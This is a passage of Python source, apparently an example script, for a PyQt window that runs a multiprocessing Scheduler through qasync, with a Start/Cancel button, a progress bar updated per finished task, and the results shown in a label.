self.button.clicked.connect(self.on_click)
layout.addWidget(self.button)
self.scheduler: Scheduler = None
def on_click(self):
"""
Called when the button is clicked.
"""
if self.scheduler is None or not self.scheduler.is_running():
# "Start" was clicked. Start the coroutine which runs the scheduler.
asyncio.ensure_future(self.do_calculations())
self.button.setText("Cancel")
else:
# "Cancel" was clicked. Terminate the scheduler.
self.scheduler.terminate()
self.button.setText("Start")
self.progress.setValue(0)
async def do_calculations(self):
"""
Does the calculations using a scheduler, and shows the output in the label.
"""
self.scheduler = Scheduler(progress_callback=self.on_progress)
num_processes = 16
args = []
for _ in range(num_processes):
sleep_time = random.randint(1, 8)
# Add to list of arguments. Must be tuple.
args.append((sleep_time,))
# Run all processes and `await` the results: an ordered list containing one int from each process.
output: List[int] = await self.scheduler.map(
target=long_calculation, args=args,
)
# (If the scheduler was terminated before completion, we don't want the results).
if not self.scheduler.terminated:
text = ", ".join([str(i) for i in output])
self.label.setText(f"Output: {text}")
self.button.setText("Start")
def on_progress(self, done: int, total: int) -> None:
"""
Updates the progress bar when scheduler finishes a task.
"""
if done == 0:
self.progress.setMaximum(total)
self.progress.setValue(done)
def closeEvent(self, event: QtGui.QCloseEvent) -> None:
"""
Terminates the scheduler when the window exits.
"""
if self.scheduler:
self.scheduler.terminate()
if __name__ == "__main__":
app = QApplication(sys.argv)
# Important: set the event loop using `qasync`.
loop = qasync.QEventLoop(app)
asyncio.set_event_loop(loop)
window = Window()
window.show()
with loop:
sys.exit(loop.run_forever())
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.